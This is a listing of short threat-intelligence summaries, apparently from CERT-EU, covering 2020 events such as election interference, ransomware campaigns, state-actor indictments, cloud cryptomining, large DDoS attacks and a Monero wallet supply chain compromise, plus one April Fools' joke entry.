Threat intelligence
-
Cyber-attacks against the 2020 US elections - A first analysis
Thursday, November 05, 2020 08:43:00 AM CET- According to US authorities and security companies, several actors attempted to influence or disrupt the US 2020 presidential elections.
- Four categories of attacks have been identified: influence operations, cyberespionage, cybercrime, and hacktivism.
- US authorities took measures such as dismantling attackers' infrastructure, charging or sanctioning individuals or organisations, and sharing technical alerts.
- Public reports allow to draw a first synthetic analysis on the _state of the art_ for election interference risk mitigation. -
Thanos ransomware: criminal and disruptive attacks
Tuesday, October 20, 2020 03:25:00 PM CEST- Thanos is a ransomware-as-a-service offer used by different threat actors.
- A variant was used for financial gain against various victims in Europe in June 2020.
- Another variant was used in the Middle East and North Africa in July 2020.
- Israeli researchers believe that the Iranian MuddyWater state-sponsored threat actor may also have used a variant of Thanos against prominent Israeli entities in September. -
US DoJ indicts Russia’s Sandworm threat actor
Tuesday, October 20, 2020 01:14:00 PM CEST- US authorities charged 6 members of the Russian Military Intelligence unit 74455 (aka Sandworm) threat actor.
- Sandworm is accused of - mostly disruptive - cyberoperations in Ukraine (electric grid), France (political entities), UK and the Netherlands (chemical laboratories), Georgia (government, media), South Korea (2018 Winter Olympics) and globally (NotPetya).
- This indictment follows sanctions imposed on the same organisation by the EU in July 2020. -
Threat Landscape Report for Q3 2020 - Executive Summary
Monday, October 19, 2020 05:51:00 PM CESTDirect Threats to EU Institutions, Bodies and Agencies
-
A cryptomining worm that steals AWS credentials
Wednesday, August 19, 2020 06:01:00 PM CEST- A new piece of malware is targeting Amazon Web Services and steals credentials from them.
- Furthermore it uses these credentials to breach and exploit other cloud-based services for cryptomining.
- There is a proliferation of automated cloud attacks, largely based on insufficient security measures on these services. -
Insecure S3 buckets can lead to serial exploitation
Wednesday, August 19, 2020 06:00:00 PM CEST- Research shows that unsecured cloud-based storage buckets can be scanned for the existence of credentials.
- The process of harvesting credentials and using them to exploit additional services has the potential to become automated. -
Threat Landscape Report for Q2 2020 - Executive Summary
Friday, July 31, 2020 04:36:00 PM CESTDirect Threats to EU Institutions, Bodies, and Agencies
-
Signed PDF documents vulnerable to manipulation
Tuesday, July 28, 2020 03:45:00 PM CESTKey Points
- 15 of the biggest PDF viewers are vulnerable to “Shadow Attack – Hide and Replace” involving manipulation of documents after signing.
- The attack takes use of hidden layers in the document, invisible to the victim but included in the signed version.
- Adobe, LibreOffice, Foxit and SodaPDF have issued patches for the vulnerability. -
Largest ever DDoS in PPS against a European bank
Saturday, July 04, 2020 01:02:00 PM CEST- The largest DDoS attack ever measured in packets per second (PPS) was mitigated by Akamai on June 21.
- The attack reached a peak of 809 million PPS, more than double the previous PPS record.
- The target was an unnamed European bank. -
CERT-EU Cyber Brief - July 2020
Friday, July 03, 2020 11:05:00 AM CESTCyber Briefs are monthly executive reports that aim to present an overview of the most relevant developments in cyber security, based exclusively on open sources, with a view to inform political leadership and senior management in its constituency. Additional information on any item in this Brief can be provided upon request. Cyber Briefs are TLP:WHITE.
-
Largest ever DDoS attack targeted AWS
Thursday, June 18, 2020 04:11:00 PM CEST- The largest DDoS attack ever recorded targeted AWS last February.
- The attack lasted three days and the traffic reached 2,3 Tbps.
- The attack highly likely targeted a single customer but had implications for the whole cloud services provider. -
Recent state-sponsored disinformation operations on Twitter
Tuesday, June 16, 2020 12:24:00 PM CEST- Twitter has discovered distinct state-sponsored disinformation operations originating in China, Russia and Turkey.
- In previous months, countries such as Saudi Arabia, UAE, Egypt and Ecuador have also engaged in such campaigns. -
Ransomware and auctions
Friday, June 05, 2020 11:26:00 AM CEST- Cybercriminals behind the REvil ransomware are auctioning off sensitive data stolen from their victims.
- The current auction prices range from $50 000 to $200 000.
- The new tactic adopted by REvil operators marks an escalation in methods aimed at coercing victims to pay up.
- Like for other recently introduced ransomware extortion schemes, it is likely to be adopted by other cybercriminal groups. -
CERT-EU Cyber Brief - June 2020
Tuesday, June 02, 2020 07:30:00 PM CESTCyber Briefs are monthly executive reports that aim to present an overview of the most relevant developments in cyber security, based exclusively on open sources, with a view to inform political leadership and senior management in its constituency. Additional information on any item in this Brief can be provided upon request. Cyber Briefs are TLP:WHITE.
-
Massive trading of stolen data
Wednesday, May 13, 2020 10:06:00 AM CEST- At least 11 digital services companies affected by several breaches in the previous period, now see their databases sold on the darknet.
- A single cybercriminal actor is claiming to be in possession of all the data.
- Microsoft΄s GitHub account was highly likely also breached by the same threat actor. -
Corporate Mobile Device Management system breach
Tuesday, May 12, 2020 09:57:00 AM CEST- Researchers have discovered a case where a mobile device management (MDM) system has been abused to spread malware to a large number of mobile devices in an enterprise.
- The central role MDMs play in managing mobile devices gives them unique access potential in case they are breached. -
Threat Landscape Report for Q1 2020 - Executive Summary
Tuesday, April 21, 2020 11:20:00 AM CESTDirect Threats to EU Institutions, Bodies, and Agencies
-
Children of Mirai
Monday, April 20, 2020 10:49:00 PM CESTKey Points
- New IoT botnets are building on Mirai’s success.
- With new features and persistence methods, these new attack tools are formidable threats.
- Most such botnets are created for financial gain and are highly likely available for hire. -
BGP hijacking by Rostelecom
Monday, April 20, 2020 10:47:00 PM CESTKey Points
- Rostelecom, a large Russian telecom provider, has committed a BGP hijacking on April 1.
- BGP hijackings are myriad and often not intentional, although they can be used to obtain a man-in-the-middle position or to capture traffic for later decryption.
- It is unclear if this incident was accidental.
- Rostelecom has worked with one of the security firms reporting the incident on resolving it. -
Cryptomining attacks on Docker systems
Wednesday, April 15, 2020 02:12:00 PM CESTKey Points
- Insecure instances of the popular Docker virtualisation platform are being targeted in a wide spread campaign aiming to abuse them for cryptomining.
- The methodology of the campaign exposes unsecured Docker installations and may also endanger other hosted applications, the hosting server, and adjacent systems.
- The case underlines the dangers of inadequate security configurations resulting in publicly exposed systems. -
COVID-19 monitoring technology
Wednesday, April 15, 2020 02:06:00 PM CESTKey Points
- According to public reports, at least 33 countries have adopted monitoring technology to curb the COVID-19 pandemic as of April 15, 2020.
- The purpose of this surveillance is to track entire or specific categories of populations, analyse movements, detect, diagnose and quarantine or alert individuals at risk.
- Tracking projects have initially been started by governments, but now technology firms are proactively designing solutions.
- Efforts to safeguard privacy vary significantly among countries. -
Attacks on Elasticsearch databases
Monday, April 06, 2020 04:58:00 PM CESTKey Points
- The widely used Elasticsearch data aggregation and analysis service is being targeted by an automated campaign.
- The campaign identifies and wipes internet exposed databases.
- Elasticsearch services have in the past been repeatedly found accessible due to misconfigurations and bad management, exposing troves of data they were supposed to safekeep. -
Mischievous RFC standards – ongoing threat
Wednesday, April 01, 2020 09:24:00 AM CESTKey Points
- The long-existingestablished and well- documented threat actor IETF (aka APT0) is likely to strike globally today.
- Its historical activity of introducing mischievous standards into internet technology borders on the ridiculous.
- Potential victims should scan their mail traffic for so-called RFC documents issued with today’s date and delete them immediately. -
Attacks on Healthcare
Monday, March 23, 2020 05:38:00 PM CET- Healthcare organisations provide interesting targets to cyber criminals.
- Due to the criticality of their function, they are more prone to submit to cyber-extortion.
- The most prevalent type of attack in the sector is ransomware. -
Cookiethief allows for social media account takeover
Tuesday, March 17, 2020 09:24:00 AM CETKey Points
- A newly discovered malware steals cookies from social network apps such as Facebook.
- The attacker can then completely take over the victim’s social network account.
- The malware abuses the trusted relationship between the victim’s device and the social network.
- This attack is particularly difficult for the social network to detect. -
Coronavirus – Cyber exploitation
Friday, March 06, 2020 02:18:00 PM CET- Heightened public interest on the coronavirus spurs cybercriminal and disinformation operations.
- At least six different pieces of malware have been distributed using fraudulent coronavirus-themed emails in several campaigns worldwide.
- At least two likely state-sponsored information operations have been reported. -
Credit-card web-skimming infections can last several months
Friday, February 28, 2020 01:00:00 PM CET- E-commerce websites infections by credit-card web-skimmers can last several months.
- The lack of security monitoring and reaction to notifications by e-commerce websites’ owners constitutes a major risk factor.
- Online shops with large audiences would typically dedicate more resources in patching security flaws and therefore would likely be less risky. -
Russian intelligence officers caught scouting undersea cables
Wednesday, February 26, 2020 12:18:00 PM CET- Russian agents were seen scouting undersea fibre-optic internet cables arriving at the Irish shore.
- Irish police sources link the agents to Russian military intelligence service GRU.
- It is currently unclear what their exact goal was. -
US indicts Chinese military hackers
Monday, February 24, 2020 12:39:00 PM CET- The US Department of Justice charged four Chinese members of the People’s Liberation Army for conspiracy and hacking.
- Indictments have been a component of the US cyber diplomatic and juridical toolbox since at least 2014.
- In 2019 US technology firms started to enforce the US government’s sanctions against selected “foreign adversaries”. -
State actors targeting mobile phones
Monday, February 24, 2020 12:38:00 PM CET- Amazon CEO’s mobile was highly likely infected by espionage malware, that exfiltrated personal information.
- The infection was highly likely caused by Saudi Arabia rulers’ messages.
- Likely candidates for the malware used are a number of espionage platforms marketed to governments.
- Mobile devices continuously seen as valuable resources of personal and financial information by state and criminal actors. -
Executive Summary of CERT-EU's Threat Landscape Report 2019Q4
Friday, January 24, 2020 01:50:00 PM CET- A summary of direct threats to EU institutions, bodies and agencies
- An overview of malware used
- Targeted sectors and sectoral threats
- Geographical threats -
Ransomware in the transportation sector
Wednesday, January 22, 2020 01:31:00 PM CET- Transportation and logistics are particularly attractive to operators of ransomware.
- Ransomware attacks against transportation operators usually correspond to the following scenarios: opportunistic criminal infections, hybrid attacks perpetrated by state-sponsored attacks, cybercriminal big game hunting. -
Free smartphones for low-income households shipped with malware
Wednesday, January 22, 2020 01:31:00 PM CET- Free smartphones being issued in a welfare program contained irremovable malware.
- The company issuing the phones has denied this software is malware, but this is repudiated by public knowledge.
- The inclusion of data leaking malware is on the ri -
SHA1 collision attacks shown to be practical
Wednesday, January 22, 2020 01:30:00 PM CET- A new research demonstrates the practicality and affordability of attacks against the SHA1 hash1 function.
- SHA1 has been considered unsafe since 2005.
- The new findings are relevant because SHA1 is still used in multiple applications. -
Ransomware now combined with data leakage
Wednesday, January 22, 2020 01:30:00 PM CET- Ransomware extortion cases have started to include (and realise) data leakage threats.
- In a number of cases in December 2019 and January 2020 operators of ransomware released victim's internal data.
- The tactic represents an upscaling of ransomware operations in spite of the technical and logistical requirements. -
Lazarus Group financial targeting
Wednesday, January 22, 2020 01:28:00 PM CET- North Korean threat actor Lazarus Group continues to target financial institutions and cryptocurrencies.
- The goal is likely collecting funds for North Korea.
- Lazarus Group continues to be an important asset for the North Korean regime for both revenue generation, but also technological cyberespionage. -
Waves of ransomware in December 2019
Tuesday, January 07, 2020 10:13:00 AM CET- Several high-profile ransomware attacks were observed in December 2019.
- Public and private organisations in several countries and sectors have been affected.
- In two cases, the ransom note reached $6M, the highest amount reported so far.
- In two cases, cybercriminals have leaked data belonging to their victim in an attempt to force the payment of the ransom. -
Major cryptocurrency provider compromised in a supply chain attack
Tuesday, January 07, 2020 10:10:00 AM CET- The official command line interface Monero wallet was compromised and used in a supply chain attack.
- At least one person has reported financial loss due to the compromise.
- Cryptocurrency platforms and software are a high-value target for cyber-thieves.